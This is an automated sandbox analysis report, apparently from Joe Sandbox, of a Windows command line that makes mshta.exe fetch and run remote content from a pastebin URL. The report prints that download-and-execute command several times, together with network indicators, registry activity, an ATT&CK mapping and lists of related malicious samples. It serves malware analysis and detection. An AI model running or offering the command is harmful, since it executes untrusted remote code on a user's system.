Create Interactive Tour

Windows Analysis Report

Overview

General Information

Analysis ID:	470697
Infos:
Most interesting Screenshot:

Detection

Score:	52
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Sigma detected: Mshta Download Pastebin

Connects to a pastebin service (likely for C&C)

Queries the volume information (name, serial number etc) of a device

Searches for the Microsoft Outlook file path

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

JA3 SSL client fingerprint seen in connection with other malware

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Creates a process in suspended mode (likely to inject code)

IP address seen in connection with other malware

Classification

Process Tree

System is w10x64

cmd.exe (PID: 6360 cmdline: cmd /C 'c:\windows\system32\mshta.EXE http:\\pastebin.com\raw\i5mSzahw' MD5: F3BDBE3BB6F734E357235F4D5898582D)

conhost.exe (PID: 6368 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)

mshta.exe (PID: 6416 cmdline: c:\windows\system32\mshta.EXE http:\\pastebin.com\raw\i5mSzahw MD5: 7083239CE743FDB68DFC933B7308E80A)

cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

Data Obfuscation:

Sigma detected: Mshta Download Pastebin

Show sources

Source: Process started

Author: Joe Security: Data: Command: c:\windows\system32\mshta.EXE http:\\pastebin.com\raw\i5mSzahw, CommandLine: c:\windows\system32\mshta.EXE http:\\pastebin.com\raw\i5mSzahw, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\mshta.exe, NewProcessName: C:\Windows\SysWOW64\mshta.exe, OriginalFileName: C:\Windows\SysWOW64\mshta.exe, ParentCommandLine: cmd /C 'c:\windows\system32\mshta.EXE http:\\pastebin.com\raw\i5mSzahw', ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 6360, ProcessCommandLine: c:\windows\system32\mshta.EXE http:\\pastebin.com\raw\i5mSzahw, ProcessId: 6416

Jbx Signature Overview

• Compliance
• Networking
• System Summary
• Data Obfuscation
• Hooking and other Techniques for Hiding and Protection
• HIPS / PFW / Operating System Protection Evasion
• Language, Device and Operating System Detection

Click to jump to signature section

Show All Signature Results

Source: unknown

HTTPS traffic detected: 104.23.98.190:443 -> 192.168.2.3:49707 version: TLS 1.2

Networking:

Connects to a pastebin service (likely for C&C)

Show sources

Source: unknown

DNS query: name: pastebin.com

Source: global traffic

HTTP traffic detected: GET /raw/i5mSzahw HTTP/1.1Accept: */*Accept-Language: en-USAccept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: pastebin.comConnection: Keep-Alive

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: Joe Sandbox View	IP Address: 104.23.98.190 104.23.98.190
Source: Joe Sandbox View	IP Address: 104.23.98.190 104.23.98.190

Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707

Source: mshta.exe, 00000002.00000002.481657075.0000000009076000.00000002.00000001.sdmp	String found in binary or memory: http://fontfabrik.com
Source: mshta.exe, 00000002.00000002.478902815.00000000053AC000.00000004.00000001.sdmp	String found in binary or memory: http://pastebin.com/raw/i5mSzahw
Source: mshta.exe, 00000002.00000002.481657075.0000000009076000.00000002.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: mshta.exe, 00000002.00000002.481657075.0000000009076000.00000002.00000001.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: mshta.exe, 00000002.00000002.481657075.0000000009076000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: mshta.exe, 00000002.00000002.481657075.0000000009076000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: mshta.exe, 00000002.00000002.481657075.0000000009076000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: mshta.exe, 00000002.00000002.481657075.0000000009076000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: mshta.exe, 00000002.00000002.481657075.0000000009076000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: mshta.exe, 00000002.00000002.481657075.0000000009076000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: mshta.exe, 00000002.00000002.481657075.0000000009076000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: mshta.exe, 00000002.00000002.481657075.0000000009076000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: mshta.exe, 00000002.00000002.481657075.0000000009076000.00000002.00000001.sdmp	String found in binary or memory: http://www.fonts.com
Source: mshta.exe, 00000002.00000002.481657075.0000000009076000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: mshta.exe, 00000002.00000002.481657075.0000000009076000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: mshta.exe, 00000002.00000002.481657075.0000000009076000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: mshta.exe, 00000002.00000002.481657075.0000000009076000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: mshta.exe, 00000002.00000002.481657075.0000000009076000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: mshta.exe, 00000002.00000002.481657075.0000000009076000.00000002.00000001.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: mshta.exe, 00000002.00000002.481657075.0000000009076000.00000002.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: mshta.exe, 00000002.00000002.481657075.0000000009076000.00000002.00000001.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: mshta.exe, 00000002.00000002.481657075.0000000009076000.00000002.00000001.sdmp	String found in binary or memory: http://www.sakkal.com
Source: mshta.exe, 00000002.00000002.481657075.0000000009076000.00000002.00000001.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: mshta.exe, 00000002.00000002.481657075.0000000009076000.00000002.00000001.sdmp	String found in binary or memory: http://www.tiro.com
Source: mshta.exe, 00000002.00000002.481657075.0000000009076000.00000002.00000001.sdmp	String found in binary or memory: http://www.typography.netD
Source: mshta.exe, 00000002.00000002.481657075.0000000009076000.00000002.00000001.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: mshta.exe, 00000002.00000002.481657075.0000000009076000.00000002.00000001.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: mshta.exe, 00000002.00000002.478902815.00000000053AC000.00000004.00000001.sdmp	String found in binary or memory: https://pastebin.com/raw/i5mSzahw

Source: unknown

DNS traffic detected: queries for: clientconfig.passport.net

Source: global traffic

Source: unknown

HTTPS traffic detected: 104.23.98.190:443 -> 192.168.2.3:49707 version: TLS 1.2

Source: C:\Windows\SysWOW64\mshta.exe

Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE

Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: unknown	Process created: C:\Windows\SysWOW64\cmd.exe cmd /C 'c:\windows\system32\mshta.EXE http:\\pastebin.com\raw\i5mSzahw'
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\mshta.exe c:\windows\system32\mshta.EXE http:\\pastebin.com\raw\i5mSzahw
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\mshta.exe c:\windows\system32\mshta.EXE http:\\pastebin.com\raw\i5mSzahw	Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32

Jump to behavior

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6368:120:WilError_01

Source: C:\Windows\SysWOW64\mshta.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\i5mSzahw[1]

Jump to behavior

Source: classification engine

Classification label: mal52.troj.evad.win@4/1@2/1

Source: C:\Windows\SysWOW64\mshta.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	File read: C:\Windows\System32\drivers\etc\hosts			Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Data Obfuscation:

Source: C:\Windows\SysWOW64\mshta.exe	Code function: 2_2_06D6E215 pushfd ; retf		2_2_06D6E21B
Source: C:\Windows\SysWOW64\mshta.exe	Code function: 2_2_06D6F772 push 06D6F7B0h; retf		2_2_06D6F784

Source: C:\Windows\SysWOW64\mshta.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\mshta.exe c:\windows\system32\mshta.EXE http:\\pastebin.com\raw\i5mSzahw

Jump to behavior

Source: mshta.exe, 00000002.00000002.478587797.0000000003F80000.00000002.00000001.sdmp	Binary or memory string: Program Manager
Source: mshta.exe, 00000002.00000002.478587797.0000000003F80000.00000002.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: mshta.exe, 00000002.00000002.478587797.0000000003F80000.00000002.00000001.sdmp	Binary or memory string: Progman
Source: mshta.exe, 00000002.00000002.478587797.0000000003F80000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Source: C:\Windows\SysWOW64\cmd.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Queries volume information: C:\Windows\Fonts\times.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation	Jump to behavior

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation	Path Interception	Process Injection12	Masquerading1	OS Credential Dumping	Query Registry1	Remote Services	Email Collection1	Exfiltration Over Other Network Medium	Web Service1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Process Injection12	LSASS Memory	Process Discovery1	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Encrypted Channel2	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information1	Security Account Manager	System Information Discovery12	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol2	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Binary Padding	NTDS	Remote System Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol13	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Software Packing	LSA Secrets	Remote System Discovery	SSH	Keylogging	Data Transfer Size Limits	Ingress Tool Transfer1	Manipulate Device Communication		Manipulate App Store Rankings or Ratings

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

No Antivirus matches

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

Source	Detection	Scanner	Label	Link
clientconfig.passport.net	0%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe

Domains and IPs Download Network PCAP: filtered – full

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
pastebin.com	104.23.98.190	true	false		high
clientconfig.passport.net	unknown	unknown	true	0%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://pastebin.com/raw/i5mSzahw	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.apache.org/licenses/LICENSE-2.0	mshta.exe, 00000002.00000002.481657075.0000000009076000.00000002.00000001.sdmp	false		high
http://www.fontbureau.com	mshta.exe, 00000002.00000002.481657075.0000000009076000.00000002.00000001.sdmp	false		high
http://www.fontbureau.com/designersG	mshta.exe, 00000002.00000002.481657075.0000000009076000.00000002.00000001.sdmp	false		high
http://www.fontbureau.com/designers/?	mshta.exe, 00000002.00000002.481657075.0000000009076000.00000002.00000001.sdmp	false		high
http://www.founder.com.cn/cn/bThe	mshta.exe, 00000002.00000002.481657075.0000000009076000.00000002.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers?	mshta.exe, 00000002.00000002.481657075.0000000009076000.00000002.00000001.sdmp	false		high
http://www.tiro.com	mshta.exe, 00000002.00000002.481657075.0000000009076000.00000002.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers	mshta.exe, 00000002.00000002.481657075.0000000009076000.00000002.00000001.sdmp	false		high
http://www.goodfont.co.kr	mshta.exe, 00000002.00000002.481657075.0000000009076000.00000002.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.carterandcone.coml	mshta.exe, 00000002.00000002.481657075.0000000009076000.00000002.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.sajatypeworks.com	mshta.exe, 00000002.00000002.481657075.0000000009076000.00000002.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.typography.netD	mshta.exe, 00000002.00000002.481657075.0000000009076000.00000002.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers/cabarga.htmlN	mshta.exe, 00000002.00000002.481657075.0000000009076000.00000002.00000001.sdmp	false		high
http://www.founder.com.cn/cn/cThe	mshta.exe, 00000002.00000002.481657075.0000000009076000.00000002.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.galapagosdesign.com/staff/dennis.htm	mshta.exe, 00000002.00000002.481657075.0000000009076000.00000002.00000001.sdmp	false	URL Reputation: safe	unknown
http://fontfabrik.com	mshta.exe, 00000002.00000002.481657075.0000000009076000.00000002.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.founder.com.cn/cn	mshta.exe, 00000002.00000002.481657075.0000000009076000.00000002.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers/frere-jones.html	mshta.exe, 00000002.00000002.481657075.0000000009076000.00000002.00000001.sdmp	false		high
http://www.jiyu-kobo.co.jp/	mshta.exe, 00000002.00000002.481657075.0000000009076000.00000002.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.galapagosdesign.com/DPlease	mshta.exe, 00000002.00000002.481657075.0000000009076000.00000002.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers8	mshta.exe, 00000002.00000002.481657075.0000000009076000.00000002.00000001.sdmp	false		high
http://www.fonts.com	mshta.exe, 00000002.00000002.481657075.0000000009076000.00000002.00000001.sdmp	false		high
http://www.sandoll.co.kr	mshta.exe, 00000002.00000002.481657075.0000000009076000.00000002.00000001.sdmp	false	URL Reputation: safe	unknown
https://pastebin.com/raw/i5mSzahw	mshta.exe, 00000002.00000002.478902815.00000000053AC000.00000004.00000001.sdmp	false		high
http://www.urwpp.deDPlease	mshta.exe, 00000002.00000002.481657075.0000000009076000.00000002.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.zhongyicts.com.cn	mshta.exe, 00000002.00000002.481657075.0000000009076000.00000002.00000001.sdmp	false	URL Reputation: safe	unknown
http://www.sakkal.com	mshta.exe, 00000002.00000002.481657075.0000000009076000.00000002.00000001.sdmp	false	URL Reputation: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
104.23.98.190	pastebin.com	United States		13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox Version:	33.0.0 White Diamond
Analysis ID:	470697
Start date:	24.08.2021
Start time:	15:19:11
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 6m 22s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultwindowscmdlinecookbook.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	27
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal52.troj.evad.win@4/1@2/1
EGA Information:	Failed
HDC Information:	Failed
HCA Information:	Successful, ratio: 100% Number of executed functions: 0 Number of non-executed functions: 0
Cookbook Comments:	Adjust boot time Enable AMSI
Warnings:	Show All Exclude process from analysis (whitelisted): MpCmdRun.exe, BackgroundTransferHost.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, svchost.exe, UsoClient.exe Excluded IPs from analysis (whitelisted): 96.16.150.73, 20.82.210.154, 204.79.197.200, 13.107.21.200, 23.211.6.115, 23.211.4.86, 40.112.88.60, 173.222.108.226, 173.222.108.210, 80.67.82.211, 80.67.82.235 Excluded domains from analysis (whitelisted): au.download.windowsupdate.com.edgesuite.net, store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-neu-b.northeurope.cloudapp.azure.com, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, e13551.dscg.akamaiedge.net, msagfx.live.com-6.edgekey.net, e12564.dspb.akamaiedge.net, authgfx.msa.akadns6.net, www-bing-com.dual-a-0001.a-msedge.net, audownload.windowsupdate.nsatc.net, arc.trafficmanager.net, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, au-bg-shim.trafficmanager.net, www.bing.com, fs.microsoft.com, dual-a-0001.a-msedge.net, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, a767.dscg3.akamai.net, ris.api.iris.microsoft.com, a-0001.a-afdentry.net.trafficmanager.net, store-images.s-microsoft.com Execution Graph export aborted for target mshta.exe, PID 6416 because there are no executed function Not all processes where analyzed, report is missing behavior information Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
104.23.98.190	C1jT7pIYSJ.exe	Get hash	malicious	Browse	pastebin.com/raw/npsqXhuQ
	uwoYazbVds.exe	Get hash	malicious	Browse	pastebin.com/raw/npsqXhuQ
	u6Wf8vCDUv.exe	Get hash	malicious	Browse	pastebin.com/raw/BCAJ8TgJ
	EU441789083.doc	Get hash	malicious	Browse	pastebin.com/raw/BCAJ8TgJ
	b095b966805abb7df4ffddf183def880.exe	Get hash	malicious	Browse	pastebin.com/raw/XMKKNkb0
	E1Q0TjeN32.exe	Get hash	malicious	Browse	pastebin.com/raw/XMKKNkb0
	6YCl3ATKJw.exe	Get hash	malicious	Browse	pastebin.com/raw/XMKKNkb0
	Hjnb15Nuc3.exe	Get hash	malicious	Browse	pastebin.com/raw/XMKKNkb0
	JDgYMW0LHW.exe	Get hash	malicious	Browse	pastebin.com/raw/XMKKNkb0
	4av8Sn32by.exe	Get hash	malicious	Browse	pastebin.com/raw/XMKKNkb0
	5T4Ykc0VSK.exe	Get hash	malicious	Browse	pastebin.com/raw/XMKKNkb0
	afvhKak0Ir.exe	Get hash	malicious	Browse	pastebin.com/raw/XMKKNkb0
	T6OcyQsUsY.exe	Get hash	malicious	Browse	pastebin.com/raw/XMKKNkb0
	1KITgJnGbI.exe	Get hash	malicious	Browse	pastebin.com/raw/XMKKNkb0
	PxwWcmbMC5.exe	Get hash	malicious	Browse	pastebin.com/raw/XMKKNkb0
	XnAJZR4NcN.exe	Get hash	malicious	Browse	pastebin.com/raw/XMKKNkb0
	PbTwrajNMX.exe	Get hash	malicious	Browse	pastebin.com/raw/XMKKNkb0
	22NO7gVJ7r.exe	Get hash	malicious	Browse	pastebin.com/raw/XMKKNkb0
	rE7DwszvrX.exe	Get hash	malicious	Browse	pastebin.com/raw/XMKKNkb0
	VjPHSJkwr6.exe	Get hash	malicious	Browse	pastebin.com/raw/XMKKNkb0

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
pastebin.com	x7AwL2FI1Q.exe	Get hash	malicious	Browse	104.23.98.190
	Vape Lite.exe	Get hash	malicious	Browse	104.23.98.190
	nkW2rYkh25.exe	Get hash	malicious	Browse	104.23.98.190
	6aOmK6gKcG.exe	Get hash	malicious	Browse	104.23.99.190
	1LhhZPI9MH.exe	Get hash	malicious	Browse	104.23.99.190
	vh12mmuxpj.exe	Get hash	malicious	Browse	104.23.99.190
	HNEhMTzIxu.exe	Get hash	malicious	Browse	104.23.99.190
	zfIIQ6GWAy.exe	Get hash	malicious	Browse	104.23.98.190
	Y6pCQH96bh.exe	Get hash	malicious	Browse	104.23.99.190
	GloryWSetp.exe	Get hash	malicious	Browse	104.23.98.190
	scan00008132012_pdf.jar	Get hash	malicious	Browse	104.23.99.190
	TJ-eProtestoBoletoIndevido.msi	Get hash	malicious	Browse	104.23.99.190
	ContratoAprovado+002336.msi	Get hash	malicious	Browse	104.23.98.190
	pbqkCjxPOF.exe	Get hash	malicious	Browse	104.23.98.190
	Astolfo.exe	Get hash	malicious	Browse	104.23.99.190
	Software updated v3.0.4.exe	Get hash	malicious	Browse	104.23.98.190
	4KhQ6IAyV7.exe	Get hash	malicious	Browse	104.23.99.190
	ASM9WQK4L9.exe	Get hash	malicious	Browse	104.23.99.190
	yyyy.exe	Get hash	malicious	Browse	104.23.98.190
	1PMElmjjXU.exe	Get hash	malicious	Browse	104.23.99.190

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
CLOUDFLARENETUS	l3DR3wZJlL.exe	Get hash	malicious	Browse	162.159.129.233
	zw9oqL7Fpb.exe	Get hash	malicious	Browse	104.21.19.200
	loligang.arm	Get hash	malicious	Browse	104.31.18.180
	MeqPU3v7Mi.exe	Get hash	malicious	Browse	66.235.200.147
	lates.doc	Get hash	malicious	Browse	104.21.34.19
	Bildirim_Cubugu.apk	Get hash	malicious	Browse	172.67.189.217
	QUOTE 24082021.exe	Get hash	malicious	Browse	104.21.19.200
	t7p1ekMto0.exe	Get hash	malicious	Browse	172.67.188.154
	FhKq0cr6Av.exe	Get hash	malicious	Browse	104.21.86.82
	D190a.pdf.exe	Get hash	malicious	Browse	23.227.38.74
	Details-7125618_20210823.xlsb	Get hash	malicious	Browse	162.159.130.233
	Details-7125618_20210823.xlsb	Get hash	malicious	Browse	162.159.129.233
	p3Xn5MS40D.exe	Get hash	malicious	Browse	104.21.86.82
	CONFIDENTIAL - International Conference on Military Strategies and Methods.doc	Get hash	malicious	Browse	104.21.25.157
	ATT63970.htm	Get hash	malicious	Browse	104.16.19.94
	CONFIDENTIAL - International Conference on Military Strategies and Methods.doc	Get hash	malicious	Browse	104.21.25.157
	SecuriteInfo.com.W32.MSIL_Kryptik.DVA.genEldorado.30121.exe	Get hash	malicious	Browse	172.67.188.154
	zXvieSHD5r.exe	Get hash	malicious	Browse	104.21.86.82
	WiqtUEK1DH.exe	Get hash	malicious	Browse	162.159.135.233
	6aymsd5QOF.exe	Get hash	malicious	Browse	104.21.86.82

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
37f463bf4616ecd445d4a1937da06e19	5M43WQARL7.exe	Get hash	malicious	Browse	104.23.98.190
	t7p1ekMto0.exe	Get hash	malicious	Browse	104.23.98.190
	bmd3dH4o4g.ppam	Get hash	malicious	Browse	104.23.98.190
	bmd3dH4o4g.ppam	Get hash	malicious	Browse	104.23.98.190
	Details-7125618_20210823.xlsb	Get hash	malicious	Browse	104.23.98.190
	p3Xn5MS40D.exe	Get hash	malicious	Browse	104.23.98.190
	QUOTATION.ppam	Get hash	malicious	Browse	104.23.98.190
	CONFIDENTIAL - International Conference on Military Strategies and Methods.doc	Get hash	malicious	Browse	104.23.98.190
	JudianService.dll	Get hash	malicious	Browse	104.23.98.190
	PEDIDO 002065-0091 GRUPO INTASAL S.L.exe	Get hash	malicious	Browse	104.23.98.190
	nd4GzpmV60.exe	Get hash	malicious	Browse	104.23.98.190
	n2WWbWDvhk.exe	Get hash	malicious	Browse	104.23.98.190
	GzsKHwvBmG.exe	Get hash	malicious	Browse	104.23.98.190
	69CDTt1pad.exe	Get hash	malicious	Browse	104.23.98.190
	New-PO-198-janne.roven.htm	Get hash	malicious	Browse	104.23.98.190
